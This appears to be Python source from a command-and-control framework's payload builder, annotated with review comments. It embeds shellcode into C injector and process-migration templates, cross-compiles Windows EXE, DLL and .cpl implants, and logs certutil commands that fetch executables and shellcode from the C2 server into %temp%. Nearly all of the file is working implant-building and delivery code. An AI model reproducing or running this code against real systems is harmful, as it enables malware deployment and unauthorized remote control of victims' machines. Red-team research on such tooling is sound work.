def CreateEXEFiles(self, sourcefile, payloadtype, name=""):
    """Render a C template with the on-disk shellcode blob and compile it for x86 and x64.

    The method reads two pre-generated shellcode files
    (``<BaseDirectory><name><Type>_x86_Shellcode.bin`` / ``..._x64_...``),
    turns each into a ``char sc[]`` C literal via ``formStr``, substitutes it
    for ``#REPLACEME#`` in ``PayloadTemplatesDirectory/sourcefile`` (and
    ``#REPLACEMEPROCESS#`` with the configured migration process), writes the
    two resulting ``.c`` files next to the shellcode and compiles them with the
    mingw cross compilers. Templates whose name ends in ``.dll.c`` are built as
    shared libraries; everything else as an executable.

    Args:
        sourcefile: Template file name relative to ``PayloadTemplatesDirectory``
            (e.g. ``"Foo.c"`` or ``"Foo.dll.c"``); the ``.c`` suffix is stripped
            when naming outputs.
        payloadtype: ``PayloadType`` member selecting which shellcode pair to
            embed; ``payloadtype.value`` is used in the output file names.
        name: Optional prefix inserted between ``BaseDirectory`` and the file
            names. It is interpolated as-is into paths and shell commands.

    Raises:
        FileNotFoundError: a shellcode blob or the template is missing.
        subprocess.CalledProcessError: a compiler invocation exits non-zero.
        NameError: ``payloadtype`` matches none of the handled members, because
            no branch below assigns ``shellcode32``/``shellcode64``.
    """
    # Default migration process from the config. It is spliced into a C string
    # literal, so single backslashes must be doubled; the second test avoids
    # re-escaping a value that was already written as "\\".
    migrate_process = DefaultMigrationProcess
    if "\\" in migrate_process and "\\\\" not in migrate_process:
        migrate_process = migrate_process.replace("\\", "\\\\")
    # Select the shellcode pair by payload type. Each branch reads the raw bytes,
    # renders them as "\xNN" escapes and wraps them in a C array declaration.
    # NOTE(review): there is no fallback branch, so an unhandled member leaves
    # shellcode32/shellcode64 unbound until the template substitution below.
    if payloadtype == PayloadType.Posh_v2:
        # Get the Posh shellcode
        with open("%s%sPosh_v2_x86_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
            shellcodesrc = f.read()
            hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
            shellcode32 = formStr("char sc[]", hexcode)
        with open("%s%sPosh_v2_x64_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
            shellcodesrc = f.read()
            hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
            shellcode64 = formStr("char sc[]", hexcode)
    elif payloadtype == PayloadType.Posh_v4:
        # Get the Posh shellcode
        with open("%s%sPosh_v4_x86_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
            shellcodesrc = f.read()
            hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
            shellcode32 = formStr("char sc[]", hexcode)
        with open("%s%sPosh_v4_x64_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
            shellcodesrc = f.read()
            hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
            shellcode64 = formStr("char sc[]", hexcode)
    elif payloadtype == PayloadType.Sharp:
        # Get the Sharp shellcode
        with open("%s%sSharp_v4_x86_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
            shellcodesrc = f.read()
            hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
            shellcode32 = formStr("char sc[]", hexcode)
        with open("%s%sSharp_v4_x64_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
            shellcodesrc = f.read()
            hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
            shellcode64 = formStr("char sc[]", hexcode)
    elif payloadtype == PayloadType.PBind:
        # Get the Posh shellcode
        with open("%s%sPBind_v4_x86_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
            shellcodesrc = f.read()
            hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
            shellcode32 = formStr("char sc[]", hexcode)
        with open("%s%sPBind_v4_x64_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
            shellcodesrc = f.read()
            hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
            shellcode64 = formStr("char sc[]", hexcode)
    elif payloadtype == PayloadType.PBindSharp:
        # Get the Sharp shellcode
        with open("%s%sPBindSharp_v4_x86_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
            shellcodesrc = f.read()
            hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
            shellcode32 = formStr("char sc[]", hexcode)
        with open("%s%sPBindSharp_v4_x64_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
            shellcodesrc = f.read()
            hexcode = "".join("\\x{:02x}".format(c) for c in shellcodesrc)
            shellcode64 = formStr("char sc[]", hexcode)
    # Create the raw x64 C file from the template.
    # NOTE(review): the template is opened in text mode without an explicit
    # encoding, so the platform default applies — confirm templates are ASCII.
    with open("%s%s" % (PayloadTemplatesDirectory, sourcefile), 'r') as f:
        content = f.read()
        content = str(content) \
            .replace("#REPLACEME#", str(shellcode64)) \
            .replace("#REPLACEMEPROCESS#", migrate_process)
    with open("%s%s%s_%s_x64.c" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")), 'w') as f:
        f.write(content)
    # Create the raw x86 C file from the same template. `content` keeps the x86
    # rendering afterwards, which is what the CPlApplet check below inspects.
    with open("%s%s" % (PayloadTemplatesDirectory, sourcefile), 'r') as f:
        content = f.read()
        content = str(content) \
            .replace("#REPLACEME#", str(shellcode32)) \
            .replace("#REPLACEMEPROCESS#", migrate_process)
    with open("%s%s%s_%s_x86.c" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")), 'w') as f:
        f.write(content)
    # Compile as a DLL when the template is a ".dll.c" source, otherwise as an EXE.
    # NOTE(review): every compiler command below is assembled by string
    # formatting and run with shell=True; BaseDirectory and name are interpolated
    # unquoted, so shell metacharacters in either would alter the command. A list
    # argv with shell=False would remove that risk without changing behaviour.
    if sourcefile.lower().endswith(".dll.c"):
        # `sourcefile` is rebound here with the ".c" stripped, so the later
        # `.replace(".c", "")` calls in this branch are no-ops.
        sourcefile = sourcefile.replace(".c", "")
        subprocess.check_output("x86_64-w64-mingw32-gcc -w -shared %s%s%s_%s_x64.c -o %s%s%s_%s_x64.dll" % (self.BaseDirectory, name, payloadtype.value, sourcefile, self.BaseDirectory, name, payloadtype.value, sourcefile), shell=True)
        subprocess.check_output("i686-w64-mingw32-gcc -w -shared %s%s%s_%s_x86.c -o %s%s%s_%s_x86.dll" % (self.BaseDirectory, name, payloadtype.value, sourcefile, self.BaseDirectory, name, payloadtype.value, sourcefile), shell=True)
        self.QuickstartLog("Payload written to: %s%s%s_%s_x64.dll" % (self.BaseDirectory, name, payloadtype.value, sourcefile))
        self.QuickstartLog("Payload written to: %s%s%s_%s_x86.dll" % (self.BaseDirectory, name, payloadtype.value, sourcefile))
        # Templates exporting CPlApplet additionally get a ".cpl" copy of each DLL.
        if "CPlApplet" in content:
            shutil.copy(f"{self.BaseDirectory}{name}{payloadtype.value}_{sourcefile}_x64.dll", f"{self.BaseDirectory}{name}{payloadtype.value}_{sourcefile}_x64.dll.cpl")
            shutil.copy(f"{self.BaseDirectory}{name}{payloadtype.value}_{sourcefile}_x86.dll", f"{self.BaseDirectory}{name}{payloadtype.value}_{sourcefile}_x86.dll.cpl")
            self.QuickstartLog("Payload written to: %s%s%s_%s_x64.dll.cpl" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")))
            self.QuickstartLog("Payload written to: %s%s%s_%s_x86.dll.cpl" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")))
    else:
        subprocess.check_output("x86_64-w64-mingw32-gcc -w %s%s%s_%s_x64.c -o %s%s%s_%s_x64.exe" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", ""), self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")), shell=True)
        subprocess.check_output("i686-w64-mingw32-gcc -w %s%s%s_%s_x86.c -o %s%s%s_%s_x86.exe" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", ""), self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")), shell=True)
        self.QuickstartLog("Payload written to: %s%s%s_%s_x64.exe" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")))
        self.QuickstartLog("Payload written to: %s%s%s_%s_x86.exe" % (self.BaseDirectory, name, payloadtype.value, sourcefile.replace(".c", "")))
def CreateEXE(self, name=""):
    """Build the four Posh_v4 executables (x86/x64, plain and migrating).

    Reads ``<BaseDirectory><name>Posh_v4_{x64,x86}_Shellcode.bin``, renders each
    blob as a ``char sc[]`` literal, substitutes it into the
    ``Shellcode_Injector.c`` and ``Shellcode_Injector_Migrate.c`` templates,
    writes ``Posh64.c``, ``Posh64_migrate.c``, ``Posh32.c`` and
    ``Posh32_migrate.c`` under ``BaseDirectory``, then compiles them with
    TDM-GCC on Windows or the mingw cross compilers elsewhere. Download hints
    are emitted through ``self.QuickstartLog``.

    Args:
        name: Optional prefix inserted between ``BaseDirectory`` and the file
            names. It is interpolated as-is into paths and shell commands.

    Raises:
        FileNotFoundError: a shellcode blob or template is missing (these reads
            happen before the try block and are not caught).

    Note:
        Compiler failures are swallowed by the broad ``except Exception`` at the
        end, which prints the error and a package-install hint and returns
        normally, so callers cannot tell from the return whether the build worked.
    """
    # x64 shellcode -> C literal
    with open("%s%sPosh_v4_x64_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
        sc64 = f.read()
        hexcode = "".join("\\x{:02x}".format(c) for c in sc64)
        sc64 = formStr("char sc[]", hexcode)
    # Plain x64 injector source. NOTE(review): templates are opened in text mode
    # without an explicit encoding, so the platform default applies.
    with open("%sShellcode_Injector.c" % PayloadTemplatesDirectory, 'r') as f:
        content = f.read()
        ccode = str(content).replace("#REPLACEME#", str(sc64))
    # The "written" message is logged before the compile step actually runs.
    self.QuickstartLog("64bit EXE Payload written to: %s%sPosh64.exe" % (self.BaseDirectory, name))
    filename = "%s%sPosh64.c" % (self.BaseDirectory, name)
    # NOTE(review): these writes bypass `with`; an exception between open() and
    # close() would leak the handle. Behaviour is otherwise the same as a with-block.
    output_file = open(filename, 'w')
    output_file.write(ccode)
    output_file.close()
    # Migrating x64 injector source.
    with open("%sShellcode_Injector_Migrate.c" % PayloadTemplatesDirectory, 'r') as f:
        content = f.read()
        ccode = str(content).replace("#REPLACEME#", str(sc64))
    # The migration process is spliced into a C string literal, so single
    # backslashes are doubled unless the value is already escaped.
    migrate_process = DefaultMigrationProcess
    if "\\" in migrate_process and "\\\\" not in migrate_process:
        migrate_process = migrate_process.replace("\\", "\\\\")
    ccode = ccode.replace("#REPLACEMEPROCESS#", migrate_process)
    self.QuickstartLog(
        "64bit EXE Payload written to: %s%sPosh64_migrate.exe" % (self.BaseDirectory, name))
    filename = "%s%sPosh64_migrate.c" % (self.BaseDirectory, name)
    output_file = open(filename, 'w')
    output_file.write(ccode)
    output_file.close()
    # x86 shellcode -> C literal
    with open("%s%sPosh_v4_x86_Shellcode.bin" % (self.BaseDirectory, name), 'rb') as f:
        sc32 = f.read()
        hexcode = "".join("\\x{:02x}".format(c) for c in sc32)
        sc32 = formStr("char sc[]", hexcode)
    # Plain x86 injector source.
    with open("%sShellcode_Injector.c" % PayloadTemplatesDirectory, 'r') as f:
        content = f.read()
        ccode = str(content).replace("#REPLACEME#", str(sc32))
    self.QuickstartLog("32bit EXE Payload written to: %s%sPosh32.exe" % (self.BaseDirectory, name))
    filename = "%s%sPosh32.c" % (self.BaseDirectory, name)
    output_file = open(filename, 'w')
    output_file.write(ccode)
    output_file.close()
    # Migrating x86 injector source (reuses the escaped migrate_process above).
    with open("%sShellcode_Injector_Migrate.c" % PayloadTemplatesDirectory, 'r') as f:
        content = f.read()
        ccode = str(content).replace("#REPLACEME#", str(sc32))
        ccode = ccode.replace("#REPLACEMEPROCESS#", migrate_process)
    self.QuickstartLog(
        "32bit EXE Payload written to: %s%sPosh32_migrate.exe" % (self.BaseDirectory, name))
    filename = "%s%sPosh32_migrate.c" % (self.BaseDirectory, name)
    output_file = open(filename, 'w')
    output_file.write(ccode)
    output_file.close()
    # Compile and print download hints. Any exception in this block is caught
    # below and reported as a probable missing-toolchain problem.
    try:
        uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "_ex64"
        # `filename` is rebound from the .c path to a random URI used only in
        # the printed hints; the same value is reused for the .bin hints below.
        filename = randomuri()
        self.QuickstartLog(Colours.END)
        self.QuickstartLog(
            "Download Posh64 & Posh32 executables using certutil:" + Colours.GREEN)
        self.QuickstartLog(
            "certutil -urlcache -split -f %s %%temp%%\\%s.exe" % (uri, filename))
        # NOTE(review): compiler commands are built by string formatting and run
        # with shell=True; BaseDirectory and name are interpolated unquoted, so
        # shell metacharacters in either would alter the command. A list argv
        # with shell=False would avoid this without changing behaviour.
        if os.name == 'nt':
            compile64 = "C:\\TDM-GCC-64\\bin\\gcc.exe %s%sPosh64.c -o %s%sPosh64.exe" % (
                self.BaseDirectory, name, self.BaseDirectory, name)
            compile32 = "C:\\TDM-GCC-32\\bin\\gcc.exe %s%sPosh32.c -o %s%sPosh32.exe" % (
                self.BaseDirectory, name, self.BaseDirectory, name)
        else:
            compile64 = "x86_64-w64-mingw32-gcc -w %s%sPosh64.c -o %s%sPosh64.exe" % (
                self.BaseDirectory, name, self.BaseDirectory, name)
            compile32 = "i686-w64-mingw32-gcc -w %s%sPosh32.c -o %s%sPosh32.exe" % (
                self.BaseDirectory, name, self.BaseDirectory, name)
        subprocess.check_output(compile64, shell=True)
        subprocess.check_output(compile32, shell=True)
        uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "_ex86"
        filename = randomuri()
        self.QuickstartLog(
            "certutil -urlcache -split -f %s %%temp%%\\%s.exe" % (uri, filename))
        if os.name == 'nt':
            compile64 = "C:\\TDM-GCC-64\\bin\\gcc.exe %s%sPosh64_migrate.c -o %s%sPosh64_migrate.exe" % (
                self.BaseDirectory, name, self.BaseDirectory, name)
            compile32 = "C:\\TDM-GCC-32\\bin\\gcc.exe %s%sPosh32_migrate.c -o %s%sPosh32_migrate.exe" % (
                self.BaseDirectory, name, self.BaseDirectory, name)
        else:
            compile64 = "x86_64-w64-mingw32-gcc -w %s%sPosh64_migrate.c -o %s%sPosh64_migrate.exe" % (
                self.BaseDirectory, name, self.BaseDirectory, name)
            compile32 = "i686-w64-mingw32-gcc -w %s%sPosh32_migrate.c -o %s%sPosh32_migrate.exe" % (
                self.BaseDirectory, name, self.BaseDirectory, name)
        subprocess.check_output(compile64, shell=True)
        subprocess.check_output(compile32, shell=True)
        self.QuickstartLog(Colours.END)
        self.QuickstartLog(
            "Download Posh/Sharp x86 and x64 shellcode from the webserver:" + Colours.GREEN)
        uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "s/64/portal"
        self.QuickstartLog(
            "certutil -urlcache -split -f %s %%temp%%\\%s.bin" % (uri, filename))
        uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "s/86/portal"
        self.QuickstartLog(
            "certutil -urlcache -split -f %s %%temp%%\\%s.bin" % (uri, filename))
        uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "p/64/portal"
        self.QuickstartLog(
            "certutil -urlcache -split -f %s %%temp%%\\%s.bin" % (uri, filename))
        uri = self.PayloadCommsHost + ":" + self.Serverport + "/" + QuickCommand + "p/86/portal"
        self.QuickstartLog(
            "certutil -urlcache -split -f %s %%temp%%\\%s.bin" % (uri, filename))
    except Exception as e:
        # NOTE(review): this catches every error (including a real compile
        # failure or a bad PayloadCommsHost/Serverport concatenation) and
        # reports it as a missing toolchain; narrowing to
        # subprocess.CalledProcessError/FileNotFoundError would keep other bugs visible.
        print(e)
        print(
            "apt-get install mingw-w64-tools mingw-w64 mingw-w64-x86-64-dev mingw-w64-i686-dev mingw-w64-common"
        )